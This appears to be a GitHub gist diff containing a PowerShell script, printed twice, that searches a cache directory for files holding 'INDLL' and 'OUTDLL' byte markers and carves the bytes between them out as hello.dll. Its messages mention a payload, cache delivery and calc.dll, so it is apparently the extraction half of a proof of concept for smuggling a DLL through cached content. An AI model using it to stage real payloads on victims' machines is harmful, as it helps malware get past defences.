justaguywhocodes · November 5, 2025 16:57
diff --git a/gistfile1.txt b/gistfile1.txt
 # Define the cache directory
 $cacheDir = "<your dir>"
 Write-Host "Cache directory: $cacheDir"

 # Helper function to find byte sequence in a byte array
 function Find-ByteSequence {
    param (
        [byte[]]$haystack,
        [byte[]]$needle
    )
    if ($haystack.Length -lt $needle.Length) { return -1 }
    for ($i = 0; $i -le $haystack.Length - $needle.Length; $i++) {
        $match = $true
        for ($j = 0; $j -lt $needle.Length; $j++) {
            if ($haystack[$i + $j] -ne $needle[$j]) {
                $match = $false
                break
            }
        }
        if ($match) { return $i }
    }
    return -1
 }

 # Define marker bytes (ASCII equivalents)
 $indllBytes = [byte[]][char[]]'INDLL'  # Length: 5
 $outdllBytes = [byte[]][char[]]'OUTDLL'  # Length: 6

 # Get all files in cache
 $files = Get-ChildItem $cacheDir -File
 Write-Host "Found $($files.Count) files in cache."

 foreach ($file in $files) {
    $filePath = $file.FullName
    Write-Host "Checking file: $filePath (Size: $($file.Length) bytes)"

    try {
        $bytes = [System.IO.File]::ReadAllBytes($filePath)
        
        # Find start of INDLL
        $startIndex = Find-ByteSequence $bytes $indllBytes
        if ($startIndex -ge 0) {
            Write-Host "INDLL marker found at byte offset: $startIndex"
            $startIndex += $indllBytes.Length  # Move past INDLL to start of DLL content
            
            # Find OUTDLL after the start
            $remainingBytes = $bytes[$startIndex..($bytes.Length - 1)]
            $endOffset = Find-ByteSequence $remainingBytes $outdllBytes
            if ($endOffset -ge 0) {
                Write-Host "OUTDLL marker found at relative offset: $endOffset (absolute: $($startIndex + $endOffset))"
                
                # Extract bytes between INDLL and OUTDLL (exclusive)
                $extractedBytes = $bytes[$startIndex..($startIndex + $endOffset - 1)]
                $outputPath = Join-Path $cacheDir "hello.dll"
                [System.IO.File]::WriteAllBytes($outputPath, $extractedBytes)
                
                Write-Host "Extracted $($extractedBytes.Length) bytes to $outputPath"
                break  # Stop after first successful extraction
            } else {
                Write-Host "OUTDLL not found after INDLL in $filePath"
            }
        } else {
            Write-Host "No INDLL marker in $filePath"
        }
    } catch {
        Write-Host "Error processing $filePath : $($_.Exception.Message)"
    }
 }

 if (Test-Path (Join-Path $cacheDir "hello.dll")) {
    Write-Host "Extraction successful. Verify file size matches original calc.dll (minus markers)."
 } else {
    Write-Host "No valid extraction. Check markers in payload or cache delivery."
 }
	# Define the cache directory
	$cacheDir = "<your dir>"
	Write-Host "Cache directory: $cacheDir"

	# Helper function to find byte sequence in a byte array
	function Find-ByteSequence {
	param (
	[byte[]]$haystack,
	[byte[]]$needle
	)
	if ($haystack.Length -lt $needle.Length) { return -1 }
	for ($i = 0; $i -le $haystack.Length - $needle.Length; $i++) {
	$match = $true
	for ($j = 0; $j -lt $needle.Length; $j++) {
	if ($haystack[$i + $j] -ne $needle[$j]) {
	$match = $false
	break
	}
	}
	if ($match) { return $i }
	}
	return -1
	}

	# Define marker bytes (ASCII equivalents)
	$indllBytes = [byte[]][char[]]'INDLL' # Length: 5
	$outdllBytes = [byte[]][char[]]'OUTDLL' # Length: 6

	# Get all files in cache
	$files = Get-ChildItem $cacheDir -File
	Write-Host "Found $($files.Count) files in cache."

	foreach ($file in $files) {
	$filePath = $file.FullName
	Write-Host "Checking file: $filePath (Size: $($file.Length) bytes)"

	try {
	$bytes = [System.IO.File]::ReadAllBytes($filePath)

	# Find start of INDLL
	$startIndex = Find-ByteSequence $bytes $indllBytes
	if ($startIndex -ge 0) {
	Write-Host "INDLL marker found at byte offset: $startIndex"
	$startIndex += $indllBytes.Length # Move past INDLL to start of DLL content

	# Find OUTDLL after the start
	$remainingBytes = $bytes[$startIndex..($bytes.Length - 1)]
	$endOffset = Find-ByteSequence $remainingBytes $outdllBytes
	if ($endOffset -ge 0) {
	Write-Host "OUTDLL marker found at relative offset: $endOffset (absolute: $($startIndex + $endOffset))"

	# Extract bytes between INDLL and OUTDLL (exclusive)
	$extractedBytes = $bytes[$startIndex..($startIndex + $endOffset - 1)]
	$outputPath = Join-Path $cacheDir "hello.dll"
	[System.IO.File]::WriteAllBytes($outputPath, $extractedBytes)

	Write-Host "Extracted $($extractedBytes.Length) bytes to $outputPath"
	break # Stop after first successful extraction
	} else {
	Write-Host "OUTDLL not found after INDLL in $filePath"
	}
	} else {
	Write-Host "No INDLL marker in $filePath"
	}
	} catch {
	Write-Host "Error processing $filePath : $($_.Exception.Message)"
	}
	}

	if (Test-Path (Join-Path $cacheDir "hello.dll")) {
	Write-Host "Extraction successful. Verify file size matches original calc.dll (minus markers)."
	} else {
	Write-Host "No valid extraction. Check markers in payload or cache delivery."
	}